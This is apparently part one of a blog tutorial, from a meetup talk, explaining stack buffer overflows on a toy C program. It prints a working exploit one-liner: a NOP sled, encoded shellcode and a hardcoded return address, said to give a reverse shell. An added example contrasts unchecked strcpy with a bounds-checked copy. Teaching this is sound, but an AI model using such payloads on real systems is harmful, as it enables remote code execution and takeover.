I’m not sure about you, but I used to see news about some component suddenly known to be vulnerable to a Buffer Overflow, with the vendor releasing an emergency patch. I never had a chance to understand the weakness in detail. I knew it’s another type of Remote Code Execution (RCE) but never explored it. If you’re like me, let’s attempt to explore it, understand how eggxactly it happens, and how to reproduce a simple Buffer Overflow to get a reverse shell.
This post is a write-up of my original talk at Null Hyderabad on the 19th of October, 2019. It was a special full-day meetup as it was Null Hyd's 100th meet.
Let’s see How Eggxactly Buffer Overflow Flaws Work:
That’s how it works.
Just kidding! Before I begin, let’s talk about “eggxactly”.
The Story of an Egg:
For someone who hasn’t seen, touched, or heard of an egg, it’s just a strange object. It feels solid when touched, until it’s hit hard and breaks. No offense to any living animals. Similarly, any technical concept looks hard until we spend some time exploring it, playing around, and learning. It becomes easy once we know about it. All we have to do is keep trying to break it until we understand it.
Let’s break the Buffer Overflow Egg!
Wait, isn’t Buffer Overflow Outdated?
Yes, it is very old. It has been seen for decades. Buffer Overflow doesn’t happen in most modern programming languages, which do not let programmers manage memory directly.
Many of these modern technologies still depend on libraries written in older languages. For example, the recent Buffer Overflow vulnerabilities seen in PHP’s WordPress and the Drupal framework were there because they included libraries written in C. There are other vulnerabilities that are similar to Buffer Overflow, and as an InfoSec enthusiast, it’s still important to learn and understand this weakness. There is some good discussion on this stackoverflow thread.
Applications of Buffer Overflow:
A Buffer Overflow gives arbitrary command execution on the target, with the privileges of the vulnerable service or user.
- If you can overflow a service that’s running as root, you can obtain a root shell from a low-privileged user: Privilege Escalation.
- If the victim service is running as a low-privileged user, you get command execution as that user on the remote system, and can then look for Privilege Escalation possibilities in other services on the target.
Sounds interesting, right? Let’s get into the details. Let me show you the magical code I pasted in the POC video:
./vuln $(python -c 'print "\x90"*(508-40-105)+"\xd9\xec\xbb\x29\x3c\xe5\x0d\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x14\x83\xc7\x04\x31\x5f\x15\x03\x5f\x15\xcb\xc9\xd4\xd6\xfc\xd1\x44\xaa\x51\x7c\x69\xa5\xb4\x30\x0b\x78\xb6\x6a\x8a\xd0\xde\x8e\x32\xc4\x42\xe5\x22\xb7\x2a\x70\xa3\x5d\xac\xda\xe9\x22\xb9\x9a\xf5\x91\xbd\xac\x90\x18\x3d\x8f\xec\xc5\xf0\x90\x9e\x53\x60\xae\xf8\xae\xf4\x99\x81\xc8\x9c\x36\x5d\x5a\x34\x21\x8e\xfe\xad\xdf\x59\x1d\x7d\x73\xd3\x03\xcd\x78\x2e\x43"+ "\x90"*40 +"\x70\xef\xff\xbf"')
Confusing? Let’s break it down. I’m running an executable ./vuln and passing a command line argument to it. Before we get to the long argument value, let’s first take a look at the vuln executable. It’s a binary compiled from vuln.c, and its source is:
The main function declares a character buffer of size 500 and copies the first command line argument into it. That’s it. If we run ./vuln hi, the value hi is copied into the buffer.
The other part of the magical string is some Python code. Let’s break that down.
When we run
echo A
A is printed on the console. When we run
python -c 'print "hi" '
-c executes a one-line Python statement and exits without entering Python’s interactive shell. The statement above uses Python to print hi. When we run
echo $(python -c 'print "A" * 10')
the letter A is printed 10 times. We use this method to build a very long string and pass it to ./vuln. We can pass such an argument to our ./vuln executable as follows:
./vuln $(python -c 'print "A" * 10 ')
./vuln receives A repeated 10 times as its argument in the above situation.
As a final stage of the preparation, let’s pass a really long string, say 550 characters, to ./vuln and see what happens.
./vuln $(python -c 'print "A" * 550')
It errored out with a Segmentation fault.
This is the hint that something unexpected happened during execution.
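To make that crash concrete, here is an added example, not the post’s own vuln.c (which is not reproduced above), that assumes the program looks the way the post describes it: a 500-byte stack buffer filled from argv[1] with strcpy(). The unchecked copy sits next to a hardened version that refuses anything that does not fit, so the 550-character argument is rejected instead of overwriting the stack; the function names and the 1024-byte scratch buffer are my own.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500   /* the buffer size the post describes for vuln.c */

/* Hypothetical reconstruction of what the post describes: a fixed-size stack
 * buffer filled by strcpy() with no length check. A 550-byte argv[1] writes
 * 50 bytes past the end of buffer, which is why ./vuln dies with a segfault. */
void vulnerable_copy(const char *arg)
{
    char buffer[BUF_SIZE];
    strcpy(buffer, arg);       /* overflows when strlen(arg) >= BUF_SIZE */
    printf("copied %zu bytes\n", strlen(buffer));
}

/* Hardened form: reject an argument that does not fit, NUL terminator
 * included, instead of truncating silently. Returns 0 on success, -1 if
 * src is too long for a destination of dst_size bytes. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)
        return -1;
    memcpy(dst, src, len + 1); /* copies the terminator as well */
    return 0;
}

/* Builds an argument of n copies of c, like python -c 'print "A" * n', and
 * copies it into a BUF_SIZE buffer the safe way: 0 accepted, -1 rejected. */
int try_repeated_arg(char c, size_t n)
{
    char arg[1024];            /* constructed input; covers the post's 550 */
    char buffer[BUF_SIZE];
    if (n >= sizeof arg)
        return -2;
    memset(arg, c, n);
    arg[n] = '\0';
    return copy_arg_checked(buffer, sizeof buffer, arg);
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];
    if (argc < 2 || copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "usage: %s <arg shorter than %d bytes>\n", argv[0], BUF_SIZE);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(buffer));
    return 0;
}
```

Note that 499 characters is the longest argument the checked copy accepts, because the 500th byte is needed for the terminating NUL; the strcpy() version silently writes past the buffer from 500 characters on.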
Let’s stop here and continue in the next part of this series.